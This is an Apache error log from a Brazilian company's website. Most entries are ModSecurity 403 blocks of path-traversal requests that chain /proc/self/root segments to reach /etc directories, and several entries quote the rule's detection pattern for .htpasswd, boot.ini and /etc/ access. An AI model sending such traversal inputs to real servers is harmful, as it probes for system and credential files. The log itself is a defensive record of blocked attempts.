[Fri Mar 20 01:44:21.513987 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:60896] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQpfqxLDW4GITHUkSfEAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:25.539028 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:60910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQqda6ubjKNq_cu4aK3gAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:28.065433 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41468] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:44:33.424917 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:48340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQsQkwaGbbGflqUZAAwQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:44:34.927767 2026] [:error] [pid 5816:tid 140411548894976] [client 74.7.243.128:52952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQspfmNfuxceSuAELJbQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:44:37.443504 2026] [:error] [pid 5816:tid 140411658000128] [client 74.7.243.128:36562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQtZfmNfuxceSuAELJcgAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:44:49.141867 2026] [proxy_fcgi:error] [pid 5816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42086] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:44:59.788443 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.228.61:60684] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzQy9a6ubjKNq_cu4aK8wAAA1g"]
[Fri Mar 20 01:45:11.121889 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42696] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:45:13.064838 2026] [:error] [pid 5816:tid 140411725141760] [client 74.7.243.128:38764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzQ2ZfmNfuxceSuAELJngAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:45:32.125906 2026] [proxy_fcgi:error] [pid 5816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43374] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:45:36.072448 2026] [core:alert] [pid 21563:tid 140411557287680] [client 74.7.243.128:40760] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/lib
[Fri Mar 20 01:45:54.145821 2026] [proxy_fcgi:error] [pid 21563:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44038] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:46:15.125792 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44582] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:46:38.361779 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45154] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:46:53.875849 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.243.128:46340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzRPfXLqtnMIWvjpaJUvAAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:47:05.133783 2026] [proxy_fcgi:error] [pid 5816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45992] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:47:15.401314 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.244.43:59662] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzRUgkwaGbbGflqUZABOAAAAME"]
[Fri Mar 20 01:47:24.391470 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:49438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzRXOoXxyEfFpUF8f9CtAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:47:36.138154 2026] [proxy_fcgi:error] [pid 8307:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46828] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:47:36.769419 2026] [:error] [pid 5816:tid 140411548894976] [client 74.7.241.31:48354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzRaJfmNfuxceSuAELKGwAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:47:38.712216 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:48452] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzRata6ubjKNq_cu4aLYwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:47:54.845768 2026] [mime_magic:error] [pid 8307:tid 140411649607424] (70014)End of file found: [client 57.141.18.32:50784] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:48:06.125761 2026] [proxy_fcgi:error] [pid 5816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47502] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:48:44.311810 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 57.141.18.16:51644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:48:45.069832 2026] [proxy_fcgi:error] [pid 5816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48490] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:49:19.115280 2026] [proxy_fcgi:error] [pid 8307:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49518] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:49:42.121814 2026] [proxy_fcgi:error] [pid 21219:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50192] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:49:51.732708 2026] [mime_magic:error] [pid 21563:tid 140411632822016] (70014)End of file found: [client 57.141.18.61:54024] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 01:50:04.175773 2026] [proxy_fcgi:error] [pid 21563:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50804] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:50:17.361065 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.228.61:50802] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abzSCPXLqtnMIWvjpaJVRQAAApQ"]
[Fri Mar 20 01:50:28.106288 2026] [proxy_fcgi:error] [pid 7235:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51502] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:50:50.152252 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52160] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:51:01.682166 2026] [core:alert] [pid 5816:tid 140411733534464] [client 57.141.18.116:55900] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 01:51:12.125786 2026] [proxy_fcgi:error] [pid 5816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52816] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:51:15.847109 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:45216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSQwkwaGbbGflqUZACAAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 01:51:22.470627 2026] [:error] [pid 21563:tid 140411649607424] [client 74.7.243.128:57742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSSkpm7ZmxKZTM4bZ9KAAAA4s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:51:28.238680 2026] [:error] [pid 21563:tid 140411658000128] [client 74.7.243.128:57742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSUEpm7ZmxKZTM4bZ9OQAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:51:34.377810 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53558] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:51:37.727869 2026] [core:alert] [pid 21563:tid 140411565680384] [client 57.141.18.38:57182] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 01:51:37.956915 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:57760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSWeoXxyEfFpUF8f9DMAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:51:56.125828 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54260] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:52:02.002223 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:40758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzScvXLqtnMIWvjpaJVmwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:52:11.453286 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:40758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSe_XLqtnMIWvjpaJVqgAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 01:52:18.125935 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54834] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:52:32.269408 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:49722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzSkNa6ubjKNq_cu4aMdAAAA0I"], referer: 